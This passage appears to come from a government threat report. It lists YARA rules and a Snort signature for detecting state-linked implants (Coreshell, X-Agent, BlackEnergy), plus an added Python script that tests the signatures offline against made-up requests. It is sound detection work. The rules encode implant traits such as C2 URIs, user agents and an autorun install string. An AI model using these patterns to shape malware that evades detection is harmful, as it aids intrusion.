        $STR2 = {c541f7e0????????????8d0c5203c92bc18bc8??8d04??460fb60c??4002c7418d48ff4432c8b8abaaaaaaf7e1c1ea028d045203c02bc8b8abaaaaaa46220c??418d48fef7e1c1ea028d045203c02bc88bc1} 
        $STR3 = {41f7e0c1ea02418bc08d0c5203c92bc18bc8428d041b460fb60c??4002c6418d48ff4432c8b8abaaaaaaf7e1c1ea028d045203c02bc8b8abaaaaaa} 
        $STR4 = {46220c?7418d48fef7e1c1ea028d04528b54245803c02bc88bc10fb64fff420fb604??410fafcbc1} 
    condition: 
        (uint16(0) == 0x5A4D) and any of them 
} 


rule IMPLANT_2_v15 
{ 
    strings: 
        $XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 } 
        $XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 } 
        $XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them 
} 

rule IMPLANT_2_v16 
{ 
    strings: 
        $OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7 75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $OBF_FUNCT 
} 

rule IMPLANT_2_v17 
{ 
    strings: 
        $STR1 = { 24108b44241c894424148b4424246836 } 
        $STR2 = { 518d4ddc516a018bd08b4de4e8360400 } 
        $STR3 = { e48178061591df75740433f6eb1a8b48 } 
        $STR4 = { 33d2f775f88b45d402d903c641321c3a } 
        $STR5 = { 006a0056ffd083f8ff74646a008d45f8 } 
    condition: 
        (uint16(0) == 0x5A4D) and 2 of them 
} 


rule IMPLANT_2_v18 
{ 
    strings: 
        $STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF 8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45 F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75 F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE 8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them 
} 


rule IMPLANT_2_v19 
{ 
    strings: 
        $obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6 74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2 E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC 89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE 9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11 BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B } 
        $cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01 00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E 0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32 45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05 42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14 81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them 
} 

rule IMPLANT_2_v20 
{ 
    strings: 
        $func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45 D8 89 55 F8 72 A0 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them 
} 


Network Indicators for Implant 2 

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Coreshell_HTTP_CALLOUT"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent: MSIE "; fast_pattern:only; pcre:"/User-Agent: MSIE [89]\.0\x0d\x0a/D"; pcre:"/^\/(?:check|update|store|info)\/$/I";) 
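As an added example covering both signatures above (the Downrage_HTTP_C2 rule for Implant 1 and the Coreshell_HTTP_CALLOUT rule for Implant 2; this is not code from the DHS report), the Python below re-implements their content and pcre checks and runs them over constructed HTTP requests, which is a quick way to validate the logic against captured request lines offline. The host names and request bodies are made up.

```python
"""Replay the report's two Snort signatures against constructed HTTP requests.

Added example, not code from the DHS report. Both signatures key on a POST
whose URI and headers follow the implant's beaconing format; this reproduces
their content/pcre checks in Python so the logic can be tested offline against
request lines taken from a proxy log or IDS capture. All requests below are
constructed samples (hypothetical host "example.test"); nothing is sent.
"""
import re

# Downrage_HTTP_C2: pcre from the signature (Snort's /I = case-insensitive).
DOWNRAGE_URI = re.compile(
    r"^/(?:[a-zA-Z0-9]{2,6}/){2,5}[a-zA-Z0-9]{1,7}\.[A-Za-z0-9+\-_.]+"
    r"/\?[a-zA-Z0-9]{1,3}=[a-zA-Z0-9+/]{19}=$", re.IGNORECASE)
# Coreshell_HTTP_CALLOUT: the two pcres from the signature.
CORESHELL_UA = re.compile(rb"User-Agent: MSIE [89]\.0\r\n")
CORESHELL_URI = re.compile(r"^/(?:check|update|store|info)/$", re.IGNORECASE)


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, uri, version) or None if malformed."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line = head.partition(b"\r\n")[0].decode("ascii", "replace")
    parts = request_line.split(" ", 2)
    return tuple(parts) if len(parts) == 3 else None


def check_downrage(raw: bytes) -> bool:
    """content:"POST"; http_method; content:"="; content:"=|20|HTTP/1.1";
    distance:19; within:10; pcre on the URI. The content chain requires the
    request line to end in "=<19 bytes>= HTTP/1.1", which the pcre makes exact."""
    req = parse_request(raw)
    if req is None:
        return False
    method, uri, version = req
    return (method == "POST" and version == "HTTP/1.1"
            and DOWNRAGE_URI.match(uri) is not None)


def check_coreshell(raw: bytes) -> bool:
    """content:"POST"; http_method; content:"User-Agent: MSIE " (fast_pattern);
    pcre on the raw header; pcre on the URI."""
    req = parse_request(raw)
    if req is None:
        return False
    method, uri, _version = req
    return (method == "POST"
            and b"User-Agent: MSIE " in raw
            and CORESHELL_UA.search(raw) is not None
            and CORESHELL_URI.match(uri) is not None)


def triage(requests):
    """Return (label, verdict) for each (label, raw_request) pair."""
    out = []
    for label, raw in requests:
        if check_downrage(raw):
            out.append((label, "Downrage_HTTP_C2"))
        elif check_coreshell(raw):
            out.append((label, "Coreshell_HTTP_CALLOUT"))
        else:
            out.append((label, "no alert"))
    return out


# Constructed samples: two that should alert, three near-misses that should not.
SAMPLES = [
    ("downrage-beacon",
     b"POST /ab/cde/fgh.php/?id=ABCDEFGHIJKLMNOPQRS= HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    ("downrage-short-token",
     b"POST /ab/cde/fgh.php/?id=ABC= HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    ("coreshell-check",
     b"POST /check/ HTTP/1.1\r\nHost: example.test\r\nUser-Agent: MSIE 8.0\r\n\r\n"),
    ("coreshell-wrong-ua",
     b"POST /check/ HTTP/1.1\r\nHost: example.test\r\nUser-Agent: MSIE 10.0\r\n\r\n"),
    ("benign-get",
     b"GET /update/ HTTP/1.1\r\nHost: example.test\r\nUser-Agent: MSIE 9.0\r\n\r\n"),
]

if __name__ == "__main__":
    for label, verdict in triage(SAMPLES):
        print(f"{label:22} {verdict}")
```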

The following YARA rules detect X-Agent/CHOPSTICK, referred to as IMPLANT 3 in the rule naming 
convention. 


IMPLANT 3 Rules: 

rule IMPLANT_3_v1 
{ 
    strings: 
        $STR1 = ">process isn't exist<" ascii wide 
        $STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide 
        $STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide 
        $STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide 
        $STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14 02 8a 45 ?? 03 fa} 
    condition: 
        any of them 
} 

rule IMPLANT_3_v2 
{ 
    strings: 
        $base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74 02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7 45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45 ?? 33 35} 
        $base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE 72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B FF 55 8B EC 83 EC 10 A1 33 35 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them 
} 

rule IMPLANT_3_v3 
{ 
    strings: 
        $STR1 = ".?AVAgentKernel@@" 
        $STR2 = ".?AVLAgentModule@@" 
        $STR3 = "AgentKernel" 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them 
} 
The following YARA rules detect BlackEnergy / Voodoo Bear, referred to as IMPLANT 4 in the rule 
naming convention. 


IMPLANT 4 Rules: 


rule IMPLANT_4_v1 
{ 
    strings: 
        $STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64 C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF 32 C6 45 E0 2E E9 ?? ?? ?? ??} 
        $STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00} 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 1 of them 
} 

rule IMPLANT_4_v2 
{ 
    strings: 
        $BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64} 
        $BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32} 
        $CONSTANT = {26 80 AC C8} 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them 
} 
rule IMPLANT_4_v3 
{ 
    strings: 
        $a1 = "Adobe Flash Player Installer" wide nocase 
        $a3 = "regedt32.exe" wide nocase 
        $a4 = "WindowsSysUtility" wide nocase 
        $a6 = "USB MDM Driver" wide nocase 

        $b1 = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 
28 0A 3F 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00 
00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 
1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 
00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 
73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 
00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00 
72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 
00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 
4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 
00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 
00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 
69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 
00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 
65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 
00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 
00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 
65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 
00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 
4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 
00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 
00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00
69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 
00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 
72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 
00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 
72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 
43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 
00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 
64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 




00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 
20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 
00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 
64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 
00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48 00 00 00 01 00 56 00 61 00 72 00 46 00 69 
00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54 00 72 00 61 00 6E 00 73 00 
6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 B0 04 09 04 B0 04}

$b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00 
02 00 3F 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00 
00 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70 
02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00 
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 6F 00 6C 00 69 00 64 00 20 
00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 73 00 00 00 00 00 
62 00 1D 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F
00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 
6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 
00 30 00 08 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 
33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 
00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 
00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 
00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 41 
00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00 
6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69 
00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 
73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 5A 00 1D 00 01 00 50 00 72 00 6F 00 64 00 75 00 63
00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 
73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 
00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 
00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00 00 00 00 00 
56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 
00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58} 

$b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15
28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00
01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04 
02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 
00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 
48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 
6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 
72 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 
00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 
78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29
00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 
67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 
20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 
4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 
00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 
20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 
00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 
30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 
65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 
00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04} 

$b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 B0 1D 01 00 06 00 01 40
B0 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 02 00
00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 
D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 
00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 
73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 
00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F 
00 72 00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00 
65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 
00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00 
6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D 00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 0D
00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 72 00 65 00 
67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E 00 01 00 4C 00 65 
00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 
69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 
69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 
00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 42 00 0D 00 01 00 4F 00 72 00 69 00 67 00
69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65 
00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00 
64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 
00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 
72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 0F
00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36 
